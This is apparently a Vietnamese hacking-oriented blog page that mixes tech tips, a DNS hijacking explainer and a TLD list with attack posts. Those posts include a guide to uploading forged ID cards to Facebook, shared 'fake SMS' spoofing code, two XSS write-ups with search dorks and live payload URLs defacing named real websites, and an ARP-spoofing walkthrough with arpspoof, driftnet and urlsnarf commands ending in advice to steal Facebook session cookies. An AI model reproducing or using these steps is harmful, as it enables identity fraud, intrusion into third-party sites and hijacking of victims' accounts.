Màu sắc thật sự của chiếc váy gây tranh cãi!

Chiếc váy này thật sự có màu gì?

Mình không quan tâm tới màu sắc của nó lắm mặc dù cá nhân mình thì thấy nó có màu xanh-đen (và thực sự thì đúng như vậy). Trong bài viết này mình chỉ chia sẻ với các bạn một hình ảnh khá thú vị. Nếu bạn nhìn ảnh dưới đây trên trình duyệt Chrome thì bạn sẽ thấy chiếc váy có màu xanh-đen, nhưng mở bài viết này trên trình duyệt Firefox và nhìn lại thì sẽ thấy nó có màu vàng-trắng.

ĐỌC TIẾP »

Microsft tặng Office 365 miễn phí cho sinh viên và giáo viên

Microsft tặng Office 365 miễn phí cho sinh viên và giáo viên

Mới đây, Microsoft đã thông báo rằng họ đang mở rộng chương trình miễn phí Office 365 phục vụ cho sinh viên trên toàn thế giới. Tính năng này ban đầu là dành cho sinh viên và giáo viên của Mỹ kể từ năm 2013.

ĐỌC TIẾP »

Kích hoạt chế độ bảo mật hai lớp trên Facebook và bảo mật facebook

- Để tăng cường thêm độ bảo mật cho tài khoản của người dùng, Facebook đã cập nhật thêm chức năng bảo mật 2 lớp. Đây là một hình thức bảo mật rất hiệu quả và được đông đảo người dùng ủng hộ và sử dụng.
- Thực chất của việc bảo mật 2 lớp chính là việc Facebook sẽ cung cấp cho bạn 1 mã số (code) qua điện thoại và sau khi đăng nhập vào Facebook bằng mật khẩu cá nhân thì bước tiếp theo là bạn phải

J2TeaM URL Tools - Các công cụ tương tác với URL

J2TeaM URL Tools - Các công cụ tương tác với URL

Đây là sản phẩm tiếp theo sau Facebook Reply (http://goo.gl/9rTo3S) của J2TeaM. Phần mở rộng này sẽ đem đến cho bạn những gì? Bạn có thể dễ dàng chia sẻ, báo cáo, rút gọn,.. liên kết đang truy cập.

ĐỌC TIẾP »

[TUT] Share tut chống R.I.P

Hôm nay mình mạn phép viết cái TUT này hướng dẫn ae chống nạn R.I.P(report) hiện nay. TUT này rất đơn giản thôi, các bạn chỉ cần fake cmnd chuẩn hoặc có cmnd thật là OK !!Các bạn vào link này : https://www.facebook.com/help/contact/183190208381429





- Dòng 1: Các bạn điền đầy đủ tên của bạn trên facebook .- Dòng 2: Chọn file ( các bạn up cmnd đã fake or cmnd thật lên ) .- Dòng 3: Country

Share code web fake sms

- Hôm nay ngồi rãnh rỗi lục đống code ra thì thấy cái này :) mình share cho ae dùng :) hoặc phát triển thêm :) .

- Code web fake SMS . Các bạn download về rồi up lên host :) .

- Mọi thắc mắc liên hệ fanpage or fb để mình giúp :) . Các bạn đăng kí tài khoản tại http://smsglobal.com. Hiện mình đang làm TUT hướng dẫn các bạn đăng kí tài khoản tại http://smsglobal.com.

p/s: Mình xin nói thêm

DNS Hijacking là gì?

DNS Hijacking (còn được gọi là DNS Redirection) là loại tấn công độc sẽ ghi đè máy tính TCP/IP đến điểm máy chủ DNS giả mạo, do đó hủy bỏ hiệu lực các thiết lập DNS mặc định. Nói cách khác, khi kẻ tấn công kiểm soát máy tính để thay đổi các thiết lập DNS, để nó chỉ đến máy chủ DNS giả mạo, quá trình này được gọi là DNS Hijacking.

Như chúng ta đều biết, "Hệ thống tên miền (DNS)" chủ yếu chịu trách nhiệm chuyển đổi tên miền thân thiện như "google.com đến địa chỉ IP tương ứng của nó "74.125.235.46". Ý tưởng rõ ràng về DNS và hoạt động của nó có thể giúp bạn hiểu rõ hơn về DNS hijacking. Nếu bạn không am hiểu khái niệm về DNS, sẽ khuyên bạn nên đọc bài viết trước đây của tôi trên Hệ thống Tên miền DNS hoạt động như thế nào?


DNS Hijacking hoạt động như thế nào?

Máy chủ DNS sở hữu và duy trì bởi nhà cung cấp dịch vụ Internet (ISP) và nhiều tổ chức doanh nghiệp tư nhân khác. Theo mặc định, máy tính của bạn được cấu hình để sử dụng máy chủ DNS của các ISP. Trong một số trường hợp, máy tính của bạn thậm chí có thể được sử dụng dịch vụ DNS của các tổ chức có uy tín khác như Google. Trong trường hợp này, bạn được cho là an toàn và tất cả mọi thứ dường như làm việc bình thường.

Tưởng tượng tình huống hacker hay chương trình phần mềm độc hại tăng truy cập trái phép vào máy tính và thay đổi các thiết lập DNS của bạn, do đó máy tính của bạn bây giờ sử dụng một trong các máy chủ DNS giả mạo sở hữu và duy trì bởi các hacker. Khi điều này xảy ra, DNS server giả mạo có thể chuyển tên miền của các trang web mong muốn (như ngân hàng, công cụ tìm kiếm, các trang web mạng xã hội ...) đến địa chỉ IP của trang web độc hại. Kết quả là, khi bạn gõ URL của trang web vào thanh địa chỉ, bạn sẽ được đưa đến trang web giả mạo thay vì một trong những trang bạn đang có ý định đến. Đôi khi, điều này có thể khiến bạn gặp rắc rối!

Sự nguy hiểm của DNS Hijacking?

Sự nguy hiểm của DNS hijacking có thể thay đổi và phụ thuộc vào ý định đằng sau cuộc tấn công. Nhiều ISP như "OpenDNS" và "Comcast" sử dụng DNS hijacking để quảng cáo hoặc thu thập số liệu thống kê. Mặc dù điều này không gây thiệt hại nghiêm trọng cho người dùng, nhưng nó thuộc một trong những hành vi vi phạm của tiêu chuẩn RFC cho DNS responses.

Nguy hiểm khác của DNS Hijacking gồm các cuộc tấn công như sau:
Pharming: Đây là loại tấn công mà lưu lượng truy cập của trang web được chuyển hướng đến trang web khác là giả. Ví dụ, khi người dùng cố gắng truy cập vào trang web mạng xã hội như Facebook.com, nó sẽ được chuyển hướng đến trang web khác với cửa sổ pop-up và quảng cáo. Điều này thường được thực hiện bởi các tin tặc để tạo ra doanh thu quảng cáo.

Phishing: Đây là loại tấn công mà người dùng được chuyển hướng đến trang web độc. Ví dụ, khi người dùng cố gắng đăng nhập vào tài khoản ngân hàng, nó osẽ chuyển hướng đến trang web độc với việc đánh cắp thông tin đăng nhập của người dùng.

Làm thế nào để ngăn chặn DNS Hijacking?

Trong hầu hết các trường hợp, những kẻ tấn công sử dụng các chương trình phần mềm độc hại như con ngựa thành Trojan để thực hiện tấn công DNS. Những trojans DNS hijacking thường được phân phối như video và audio codec, phần mềm download video, phần mềm download YoTube hoặc tiện ích miễn phí khác. Vì vậy, để được bảo vệ, bạn nên tránh xa các trang web không đáng tin cậy cung cấp tải miễn phí. DNSChanger Trojan là ví dụ về một trong những phần mềm độc hại tấn công các thiết lập DNS của hơn 4 triệu máy tính để điều khiển mang về lợi nhuận khoảng 14 triệu USD thông qua doanh thu quảng cáo gian lận.

Ngoài ra, nó cần thiết để thay đổi mật khẩu mặc định của router, do đó không nên để kẻ tấn công thay đổi các thiết lập router của bạn bằng cách sử dụng mật khẩu mặc định đi kèm với các thiết lập trên đó.

Cài đặt chương trình chống virus tốt và cập nhật nó hàng ngày có thể cung cấp nhiều bảo vệ cho máy tính của bạn chống lại bất kỳ cuộc tấn công nào.

Xử lý khi là nạn nhân của DNS Hijacking

Nếu bạn nghi ngờ máy tính của bạn bị nhiễm chương trình phần mềm độc hại như DNSChanger, bạn không cần phải hoảng sợ. Nó khá đơn giản và dễ dàng để phục hồi thiệt hại gây ra bởi các chương trình như vậy. Tất cả bạn phải làm là, chỉ cần xác minh DNS hiện tại của bạn thiết lập để đảm bảo không sử dụng bất kỳ DNS IPs trong danh sách đen. Còn không thì cấu hình lại thiết lập DNS theo hướng dẫn của ISP.

DOTNET.VN

Hệ thống Tên miền DNS hoạt động như thế nào?

Trong thế giới Internet và lĩnh vực mạng máy tính, bạn sẽ bắt gặp thuật ngữ hệ thống tên miền hoặc Domain Name Service đơn giản được gọi là DNS. Hoạt động của DNS là khái niệm cơ bản của mạng máy tính với sự hiểu biết cần thiết đặc biệt nếu bạn đang có kế hoạch trở thành hacking hoặc an ninh mạng.

Trong bài này, tôi sẽ cố gắng giải thích hệ thống tên miền hoạt động như thế nào một cách đơn giản và dễ làm theo để giúp độc giả không có bất kỳ kiến thức về mạng máy tính có thể hiểu được khái niệm.

Hệ thống tên miền (Domain Name System) là gì?

"Hệ thống tên miền" hoặc "Dịch vụ tên miền" là giao thức mạng máy tính sử dụng để ánh xạ đến người dùng tên miền thân thiện như "JokerAnonDarkKnight.Blogspot.Com" đến địa chỉ IP tương ứng của nó như "216.58.209.97".

Hệ thống tên miền (DNS) hoạt động như thế nào?Tất cả các máy tính trên Internet, có thể là máy chủ web, máy tính ở nhà hoặc bất kỳ thiết bị mạng khác có địa chỉ IP duy nhất được phân bổ cho nó. Địa chỉ IP được sử dụng để thiết lập kết nối giữa máy chủ và máy khách để chuyển dữ liệu. Cho dù bạn đang cố gắng truy cập vào trang web hoặc gửi email, DNS có vai trò rất quan trọng.

Ví dụ, khi bạn gõ "www.google.com" vào thanh địa chỉ của trình duyệt, máy tính của bạn sẽ sử dụng máy chủ DNS để lấy địa chỉ IP của máy chủ Google đó là "74.125.236.37". Sau khi có địa chỉ IP, máy tính của bạn sau đó sẽ thiết lập kết nối với máy chủ chỉ sau khi mà bạn nhìn thấy trang chủ Google tải trang trên trình duyệt. Toàn bộ quá trình được gọi là phân giải DNS.

Với hàng triệu trang web trên Internet, nó không thể để mọi người nhớ địa chỉ IP của tất cả các trang web truy cập nó. Do đó, khái niệm về tên miền đã được giới thiệu mỗi trang web có thể được xác định bởi tên độc đáo của nó làm cho nó dễ dàng để mọi người nhớ. Tuy nhiên, các địa chỉ IP vẫn được sử dụng như là cơ sở cho việc giao tiếp nội bộ của thiết bị mạng. Đây là nơi mà DNS giải quyết cho người sử dụng tên miền thân thiện với máy tương ứng địa chỉ IP thân thiện của nó.

Nói cách đơn giản, tên miền dành cho người dùng trong khi địa chỉ IP cho thiết bị mạng. "Hệ thống tên miền" là giao thức để thiết lập liên kết giữa hai người. Do đó, nó không bất ngờ mà bạn thậm chí có thể tải trang web bằng cách trực tiếp đánh địa chỉ IP thay vì tên miền trong thanh địa chỉ của trình duyệt!

Các loại máy chủ DNS và vai trò của chúng:
Hệ thống tên miền (DNS) là cơ sở dữ liệu phân tán cư trú trên nhiều máy tính trên Internet một cách có thứ bậc. Chúng bao gồm các loại sau đây:

Root Name Servers:Các máy chủ gốc đại diện cấp cao nhất của hệ thống phân cấp DNS. Đây là các máy chủ DNS có chứa cơ sở dữ liệu đầy đủ của tên miền và địa chỉ IP tương ứng của chúng. Hiện nay, có 13 máy chủ gốc phân phối trên toàn cầu, được đặt tên với chữ cái A, B, C và lên đến M.

Local Name Servers:
Các máy chủ địa phương đại diện cho các máy chủ DNS mức thấp nhất được sở hữu và duy trì bởi nhiều tổ chức kinh doanh và các nhà cung cấp dịch vụ Internet (ISP). Các máy chủ địa phương có thể phân giải tên miền thường được sử dụng vào các địa chỉ IP tương ứng bộ nhớ đệm thông tin gần đây. Bộ nhớ cache này được cập nhật và làm mới một cách thường xuyên.

DNS Server hoạt động như thế nào?
Bất cứ khi nào bạn gõ URL "http://www.jokerdarkknight.info" trên thanh địa chỉ của trình duyệt, máy tính sẽ gửi yêu cầu đến local name server để phân giải tên miền thành địa chỉ IP tương ứng của nó. Yêu cầu này được truy vấn DNS. Local name server sẽ nhận được truy vấn để tìm xem nó có chứa tên phù hợp và địa chỉ IP trong cơ sở dữ liệu. Nếu tìm thấy địa chỉ IP tương ứng (response) được trả về. Nếu không, các truy vấn được tự động chuyển đến máy chủ khác trong các cấp trên trực tiếp của hệ thống phân cấp DNS. Tiến trình này tiếp tục cho đến khi truy vấn đến máy chủ có chứa tên và địa chỉ IP phù hợp. Địa chỉ IP (response) quay trở lại các chuỗi theo thứ tự ngược lại đến máy tính của bạn.


Trong trường hợp hiếm hoi mà không ai trong số các máy chủ DNS cấp thấp hơn tên miền nhất định, các truy vấn DNS đã đến được một trong những root name server để có được response.

DOTNET.VN

Tắt chế độ tự động phát video và cấu hình độ phân giải HD trên Facebook

How to turn off autoplay videos on Facebook

Như các bạn đã biết thì khi nhấn vào một video trên Facebook thì video đó sẽ tự động phát. Nếu như các bạn muốn tiết kiệm băng thông (cho Dcom 3G chẳng hạn) hay chỉ muốn đọc bình luận thì đây là cách để tắt chế độ tự động phát video trên Facebook.

ĐỌC TIẾP »

Tải bản cài đặt đầy đủ của Chrome và Firefox để cài đặt offline

Tải bản cài đặt đầy đủ của Chrome và Firefox để cài đặt offline

Hiện tại thì bản cài đặt của cả hai trình duyệt là Google Chrome và Firefox đều là dạng web installer - tức là lúc tải thì rất nhẹ, nhưng sau đó chạy thì nó mới bắt đầu tải về bộ cài đặt đầy đủ. Nếu như bạn muốn tải luôn bản cài đặt đầy đủ để có thể cài "offline" (không cần kết nối mạng) trên máy khác (từ USB chẳng hạn) thì sao? OK, trong bài viết này Juno_okyo's Blog sẽ hướng dẫn các bạn cách làm cực kỳ đơn giản.

ĐỌC TIẾP »

Gỡ bỏ nút quản lý người dùng trên Chrome

Gỡ bỏ nút quản lý người dùng trên Chrome

Trong những phiên bản mới đây, Google Chrome đã có thêm một nút Quản lý người dùng nằm cạnh các nút Thu nhỏ (Minimize), Phóng To (Maximize) và Đóng cửa sổ. Nút này cho phép bạn đăng nhập/đăng xuất khỏi Chrome, chuyển đổi người dùng và truy cập chế độ ẩn danh dễ dàng, nhanh chóng hơn.

Nếu như bạn không thích hoặc không thực sự cần chức năng này thì đây là cách để gỡ bỏ nó khỏi Chrome.

ĐỌC TIẾP »

Dot Domain List Of Countries Of The World

US = UNITED STATES
CA = CANADA
AF = Afghanistan
AL = Albania
DZ = Algeria
AS = American Samoa
AD = Andorra
AO = Angola
AI = Anguilla
AQ = Antarctica
AG = Antigua and Barbuda
AR = Argentina
AM = Armenia
AW = Aruba
AU = Australia
AT = Austria
AZ = Azerbaijan
BS = Bahamas
BH = Bahrain
BD = Bangladesh
BB = Barbados
BY = Belarus
BE = Belgium
BZ = Belize
BJ = Benin
BM = Bermuda
BT = Bhutan
BO = Bolivia
BA = Bosnia-Herzegovina
BW = Botswana
BV = Bouvet Island
BR = Brazil
IO = British Indian Ocean Territory
BN = Brunei Darussalam
BG = Bulgaria
BF = Burkina Faso
BI = Burundi
KH = Cambodia
CM = Cameroon
CV = Cape Verde
KY = Cayman Islands
CF = Central African Republic
TD = Chad
CL = Chile
CN = China
CX = Christmas Island
CC = Cocos (Keeling) Islands
CO = Colombia
KM = Comoros
CG = Congo
CD = Congo (Democratic Republic)
CK = Cook Islands
CR = Costa Rica
HR = Croatia
CU = Cuba
CY = Cyprus
CZ = Czech Republic
DK = Denmark
DJ = Djibouti
DM = Dominica
DO = Dominican Republic
TP = East Timor
EC = Ecuador
EG = Egypt
SV = El Salvador
GQ = Equatorial Guinea
ER = Eritrea
EE = Estonia
ET = Ethiopia
FK = Falkland Islands
FO = Faroe Islands
FJ = Fiji
FI = Finland
FR = France
FX = France (European Territory)
GF = French Guiana
TF = French Southern Territories
GA = Gabon
GM = Gambia
GE = Georgia
DE = Germany
GH = Ghana
GI = Gibraltar
GR = Greece
GL = Greenland
GD = Grenada
GP = Guadeloupe
GU = Guam
GT = Guatemala
GN = Guinea
GW = Guinea Bissau
GY = Guyana
HT = Haiti
HM = Heard and McDonald Islands
VA = Holy See (Vatican)
HN = Honduras
HK = Hong Kong
HU = Hungary
IS = Iceland
IN = India
ID = Indonesia
IR = Iran
IQ = Iraq
IE = Ireland
IL = Israel
IT = Italy
CI = Ivory Coast (Cote D'Ivoire)
JM = Jamaica
JP = Japan
JO = Jordan
KZ = Kazakhstan
KE = Kenya
KI = Kiribati
KW = Kuwait
KG = Kyrgyzstan
LA = Laos
LV = Latvia
LB = Lebanon
LS = Lesotho
LR = Liberia
LY = Libya
LI = Liechtenstein
LT = Lithuania
LU = Luxembourg
MO = Macau
MK = Macedonia
MG = Madagascar
MW = Malawi
MY = Malaysia
MV = Maldives
ML = Mali
MT = Malta
MH = Marshall Islands
MQ = Martinique
MR = Mauritania
MU = Mauritius
YT = Mayotte
MX = Mexico
FM = Micronesia
MD = Moldova
MC = Monaco
MN = Mongolia
MS = Montserrat
MA = Morocco
MZ = Mozambique
MM = Myanmar
NA = Namibia
NR = Nauru
NP = Nepal
NL = Netherlands
AN = Netherlands Antilles
NC = New Caledonia
NZ = New Zealand
NI = Nicaragua
NE = Niger
NG = Nigeria
NU = Niue
NF = Norfolk Island
KP = North Korea
MP = Northern Mariana Islands
NO = Norway
OM = Oman
PK = Pakistan
PW = Palau
PS = Palestinian Territory
PA = Panama
PG = Papua New Guinea
PY = Paraguay
PE = Peru
PH = Philippines
PN = Pitcairn
PL = Poland
PF = Polynesia
PT = Portugal
PR = Puerto Rico
QA = Qatar
RE = Reunion
RO = Romania
RU = Russian Federation
RW = Rwanda
GS = S. Georgia & S. Sandwich Isls.
SH = Saint Helena
KN = Saint Kitts & Nevis Anguilla
LC = Saint Lucia
PM = Saint Pierre and Miquelon
VC = Saint Vincent & Grenadines
WS = Samoa
SM = San Marino
ST = Sao Tome and Principe
SA = Saudi Arabia
SN = Senegal
SC = Seychelles
SL = Sierra Leone
SG = Singapore
SK = Slovakia
SI = Slovenia
SB = Solomon Islands
SO = Somalia
ZA = South Africa
KR = South Korea
ES = Spain
LK = Sri Lanka
SD = Sudan
SR = Suriname
SZ = Swaziland
SE = Sweden
CH = Switzerland
SY = Syrian Arab Republic
TW = Taiwan
TJ = Tajikistan
TZ = Tanzania
TH = Thailand
TG = Togo
TK = Tokelau
TO = Tonga
TT = Trinidad and Tobago
TN = Tunisia
TR = Turkey
TM = Turkmenistan
TC = Turks and Caicos Islands
TV = Tuvalu
UG = Uganda
UA = Ukraine
AE = United Arab Emirates
GB = United Kingdom
UY = Uruguay
UM = USA Minor Outlying Islands
UZ = Uzbekistan
VU = Vanuatu
VE = Venezuela
VN = Vietnam
VG = Virgin Islands (British)
VI = Virgin Islands (USA)
WF = Wallis and Futuna Islands
EH = Western Sahara
YE = Yemen
YU = Yugoslavia
ZR = Zaire
ZM = Zambia
ZW = Zimbabwe

Scarlet Daisy Web CMS XSS Vulnerability

Dork:

"Powered by Scarlet Daisy Web Content Management System."

Path:

Domain/shop.asp?action=form&search=[XSS]

Demo:
http://www.dimensioncs.co.uk/shop.asp?action=form&search=%22%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E

http://www.claymorehomes.co.uk/shop.asp?action=form&search=%22%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E

Wordpress Slideoptinprox Plugin XSS Vulnerability

Dork:

inurl:"/wp-content/plugins/slideoptinprox/"

Path:

Domain/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]

Demo:

http://attractmorenow.com/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22%2F%3E%3Cmarquee%3E%3Ch1%3EHaCked+By+JDK%3C%2Fh1%3E%3C%2Fmarquee%3E%3Ctitle%3EXSSED+By+JDK%3C%2Ftitle%3E

https://www.feedblitz.com/f/f.fbz?AddNewUserDirecthttp://hgtesta1.info/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Ctitle%3EXSSED%20by%20JDK%3C/title%3E%3Cmarquee%3EJoker%20Dark%20Knight%3C/marquee%3E

Nhóm Hacker Anonymous gửi lời nhắn tới cộng đồng các Hacker Việt Nam

Anonymous - nhóm hacker quy mô và nguy hiểm nhất thế giới hiện nay, đang thực hiện một chiến dịch chống lại các tổ chức khủng bố hồi giáo cực đoan như Al Qeada, IS... như một cách để đáp lại vụ tấn công đẫm máu nhằm vào tòa soạn tờ tạp chí biếm họa Charlie Hebdo của Pháp cách đây không lâu

Nhóm hacker Anonymous vừa cho đăng tải một đoạn video ngắn với tiêu đề “Tin nhắn gửi đến cộng đồng Hacker Việt Nam”, trong video của Anonymous, họ gửi lời nhắn tới cộng đồng của Hacker Việt Nam và những người tự xưng là Anonymous tại Việt Nam.

"Anh em thân mến. Bây giờ là thời gian để mở mắt của các bạn!

Thông điệp chúng tôi muốn gửi đến cộng đồng của Hacker Việt Nam và những người tự xưng là Anonymous Việt Nam, khi đất nước các bạn ở trong giai đoạn mục nát và thối rữa.

Tự do ngôn luận đã không bao giờ tồn tại trong đất nước của các bạn. Đây là lý do chúng tôi muốn gửi cho các bạn tin nhắn này.

Chúng tôi có 5 lý do để gửi tin nhắn này

1. Cảnh sát "cướp" tiền người đi đường, ngay cả một phần chính phủ từ trên xuống dưới cũng ăn đút lót, muốn được trở thành các nhà độc tài. Mỗi lớp học trong hệ thống của chính phủ xuất phát cho các bạn về tự do ngôn luận và biểu ngữ chính trị. Các bạn cần phải lên tiếng và bảo vệ người dân của đất nước của bạn.

2. Tất cả trẻ em ở nước các bạn đã bị tra tấn và đánh đập đến chết vì một số người thuộc diện đóng. Sau đó học sinh lấy cơ thể của họ để đổi lấy điểm. Nếu vậy thì chúng tôi không hiểu được nhiệm vụ của Bộ giáo dục của đất nước của các bạn được tạo ra để làm gì?

Cộng đồng Hacker Việt Nam hoặc những người tự xưng là Anonymous Việt Nam cần phải chiến đấu và đòi công lý cho các nạn nhân.

3. Mỗi lần các bạn sử dụng logo của chúng tôi, các bạn phải hiểu rõ những lý tưởng của chúng tôi chính là công lý và sự tự do. Để bảo vệ tương lai cho nhân dân và vì lợi ích của mọi người, các bạn cần phải biết thực tế là các nhà lãnh đạo của đất nước các các bạn đã và đang lẩn trốn. Nếu các bạn không hiểu những điều này thì các bạn không xứng đáng sự dụng cái tên Anonymous của chúng tôi.

4. Nếu bất cứ ai sử dụng logo và hình ảnh của chúng tôi như một trò đùa, chúng tôi sẽ không để yên cho những người tự gọi mình là Anonymous.
Nếu các bạn làm trái với các lý tưởng của chúng tôi, các bạn đã và đang làm xấu đi cái tên của chúng tôi.

5. Anonymous không phải là một tệ nạn mại dâm đường phố.

Chúng tôi muốn các bạn đứng lên để thay đổi đất nước của chính các bạn."

Tin nhắn được đăng tải lên Youtube bởi nhóm Hacker AnonLeague - 1 chi nhánh nhỏ của nhóm Hacker Anonymous với giọng nói đã được kĩ thuật số hóa.

Nhóm Hacker cũng đã khẳng định: "Chúng tôi coi đây là lời kêu gọi về sự công bằng cho thế giới"

Thông qua đoạn clip này, nhóm Hacker Anonymous không hề có ý định mở bất kì cuộc tấn công nào mà nhắm kêu gọi người dân Việt Nam cũng như Cộng Đồng Hacker Việt Nam nên góp phần đấu tranh cho sự công bằng tại đất nước mình.

Video:

Thêm nút kêu gọi hành động vào Fan Page Facebook

Nút kêu gọi hành động trên Fan Page Facebook

Tình hình là Facebook mới thông báo về chức năng mới dành cho Page doanh nghiệp - đó là chức năng Kêu gọi hành động. Cụ thể thì trên Fan Page sẽ có thêm một nút mới bên cạnh nút Thích, nút này sẽ có một hành động cụ thể nào đó để người dùng tương tác như: Mua, Đăng ký, Liên hệ, Xem thêm,...

ĐỌC TIẾP »

Phương pháp tấn công MITM

MITM [ man in the middle ] - Là một phương thức tấn công của attacker, trong đó attacker đứng giữa,nhận thông tin trao đổi giữa 2 đầu truyền tin. Bên A truyền cho bên B,thông tin sẽ đi từ A qua attacker rồi mới đến B. Và tất nhiên attacker có thể xem và thay đổi thôi tin trước khi truyền đến đích.Hôm nay capuchino có đọc qua tài liệu về các thiết bị giao tiếp mạng .Trong đó có cơ bản là Hub, Switch,Router.....

Trong đó cơ chế bảo mật đi từ thấp đến cao.Hub chỉ chia ra các cổng,nhưng các gói tin đi qua nó,đều qua các cổng hết,đến khi nào nó đến máy thì mới xem đó có phải là đích đến thích hợp hay ko.Điều này rất nguy hiểm trong mạng Lan .Vì như thế nghĩa là bất kì máy nào cũng có thể bắt các gói tin này.

Đối với Switch thì khác.Switch là một thiết bị thông minh hơn Hub vì trên Switch có lưu trữ địa chỉ Mac của các máy đến.Điều này có nghĩa là các gói tin đến switch nó xem như đã xác định đc đích đến là đâu.Ko cần phải tới máy đích nữa.Điều này đảm bảo gói tin đến đc đúng đích.Đồng thời nó cũng đảm bảo đc ko có xung đột có thể xảy ra.

Router thì còn thông minh hơn Switch nữa.Trên nó lưu trữ rất nhiền thông tin.Từ các giao thức,tính toán đường đi,tốc độ,độ tin cậy.Và bảo mật cũng tốt hơn.Kiến thức capuchino có hạn nên ko trình bày sâu đc.hihi.

Trở lại với MITM.
Ở cây capuchino trình bày về giả mạo ARP.Phương pháp tấn công này rất là lợi hại,nó có thể vượt qua bảo mật và sự thông minh của switch và router.
Nói rõ hơn 1 tí về giao thức ARP ( tên đầy đủ là address resolution Protocol) .nguyên tắc làm việc của ARP là là ghi chép và phân tích các địa chị IP và địa chỉ MAC tương ứng.Giả sử như ta có 2 host là host1 và host2 chẳng hạn.Vậy việc truyền tin giữa 2 host này như thế nào.Để truyền đc tin thì phải xác định đích đến cái đã.để làm đc việc này host1 gửi một gói tin ARP [ yêu cầu tìm địa chỉ MAC của host2 có ip là IP2 đi) .Gói ARP này sẽ hỏi các host xem nó có IP2 ko,nếu đúng thì gửi lại địa chi MAC cho nó [ gói truyền đi là gói ARP request chứa MAC máy gửi đi và IP của máy cần tìm,Gói về là gói ARP reply chứa MAC của máy đã tìm đc,hoặc thêm gì nữa thì capuchino ko rõ nha, vì sao phải lấy địa chị MAC mặc dù có IP gửi rồi.Cái này có liên quan đến cấu trúc mạng,chưa 7 tầng (cấu trúc mạng OSI)].Như vậy sẽ xác định được điểm đến..Như đã nói ở trên.Việc phân tích MAC-IP này nằm trên switch.Vậy đánh lừa như thế nào để lấy đc thông tin trên đường truyền đây.Chúng ta sẽ gửi liên tiếp các gói ARP reply ,trong đó có chưa MAC của máy mình tới máy chủ,và làm cho nó nghĩ MAC đó là MAC của victim.Và nó nhầm tưởng ta là đích đến.

Mình sẽ làm demo về phương pháp tấn công này nhé.

Đầu tiên mở terminal lên.
sửa lại file ip_forward bằng lệnh echo và toán tử viết chèn vào cuối file >>
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward 

xong rồi đọc lại file này xem đã ghi thành công chưa nhé,nếu nhận đc là 1 thì là oke á
cat /proc/sys/net/ipv4/ip_forward 

giả sử ip của victim là 192.168.201.129 nhé
trong đó gateway là 192.168.201.2

ta tiếp tục
arpspoof -i eth0 -t 192.168.201.2 192.168.201.129 

sau khi nó chạy,thì terminal này bị busy,ta ko thể thao tác lệnh tiếp,vì nó phải giữ session lại.
Rất may trên backtrack cho phép ta thao tác đa nhiệm.

Mở 1 terminal khác lên,gõ screen rồi enter .

trên terminal mới tiếp tục

arpspoof -i eth0 -t 192.168.201.129 192.168.201.2 tiếp tục do terminal này bận nên ta tiếp tục mở 1 terminal khác,type screen và enter.

trên terminal mới ta mở trình driftnet lên
type:
sudo driftnet -i eth0. 

tiếp tục mở terminal mới,type screen rồi type tiêp 

sudo urlsnarf -i eth0
bây giờ nó sẽ lắng nghe trên các port 80,8080 hoặc 3128
Giải sử bi giờ trên victim vào trang google tìm với từ khóa capuchino chẳng hạn nha
thì trên driftnet của mình sẽ bắt đc gói tin hình ảnh truyền về ip 192.168.201.129

tương tự như thế,đối với các trang khác mình cũng xem đc thông tin.biết đc victim làm gì.Xem trên terminal ý.
Chẳng hạn như xem hình dưới đây,ta thấy victim đang lượn lờ trong vhbsystem kìa :v
Đối với các trang như facebook thì ta sniff cookie và login bằng cookie nhé,giống như dùng wireshark

VNHACK

Tối Ưu Hiệu Suất - Tăng Bộ Nhớ Ram

Chiếc máy tính hoạt động nhanh hay chậm, chạy được các phần mềm, game nặng mà không bị đơ ngoài việc phụ thuộc bộ vi xử lý CPU, thì bộ nhớ trong RAM là một thông số rất quan trọng.
Trong bài viết này, mình sẽ chỉ cho các bạn 5 cách để giải phóng, cũng như cải thiện bộ nhớ RAM trên máy tính Windows.

Chạy ReadyBoost (Từ Windows Vista/7 trở lên)
Tính năng ReadyBoost của Microsoft sử dụng bộ nhớ ngoài flash vai trò như 1 thanh RAM. ReadyBoost đòi hỏi một ổ đĩa USB với đủ điều kiện dưới đây:

1. 256 MB dung lượng lưu trữ
2. Thời gian truy cập của 1 phần nghìn giây hoặc ít hơn.
3. Tốc độ đọc 2,5 MB mỗi giây cho 4KB ngẫu nhiên đọc.
4. Tốc độ ghi 1,75 MB mỗi giây cho 512KB quyền ngẫu nhiên.

Với hầu hết các ổ đĩa USB hiện đại có thể đáp ứng các thông số kỹ thuật trên một cách dễ dàng.

Bạn có thể kích hoạt ReadyBoost bằng cách nhấn phải ổ đĩa USB của bạn trong My Computer , mở Properties , và sau đó điều hướng đến tab ReadyBoost . Bạn sẽ thấy một số nút tích chọn cho phép bạn kích hoạt hoặc vô hiệu hóa các tính năng cũng như một thanh trượt cho phép điều chỉnh bao nhiêu dung lượng của ổ đĩa được dành cho tính năng này. Tối đa là bốn gigabyte, nếu bạn sử dụng định dạng FAT32 trên ổ đĩa, nhưng định dạng với NTFS up trần đến 32GB.

Sử dụng tính năng ReadyBoost không mang lại lợi ích như lắp thêm bộ nhớ RAM, nhưng nó cung cấp một số cải tiến hiệu suất. Trong một số trường hợp nó có thể làm giảm thời gian tải lên đến 75%.

Sử dụng Windows Task Manager & Resource Monitor
Cách đơn giản nhất để giải phóng bộ nhớ RAM được sử dụng là mở Windows Task Manager . Chọn tab Processes và sau đó sắp xếp danh sách các chương trình đang tiêu tốn bộ nhớ theo thứ tự cao đến thấp. Điều này sẽ giúp bạn phát hiện cái gì đang tiêu thụ nhiều bộ nhớ RAM, và có thể nó không cần thiết.

Bạn có thể xem nhiều thông tin hơn bằng cách vào tab Performance , mở Resource Monitor, và quan sát phần Commit(K . Bạn sẽ thấy các thông tin trong Windows Task Manager và một đồ thị hệ thống của bạn hiện đang phân bổ RAM.

Đừng lo lắng nếu bạn nhìn thấy một số tiêu tốn RAM đáng kể. Bạn chỉ nên quan tâm nếu Resource Monitor luôn cho thấy hơn ba phần tư của bộ nhớ RAM của bạn là “Đang sử dụng” vì đó là một dấu hiệu thiếu RAM.

Vô hiệu hóa hoặc Hủy bỏ phần mềm không cần thiết
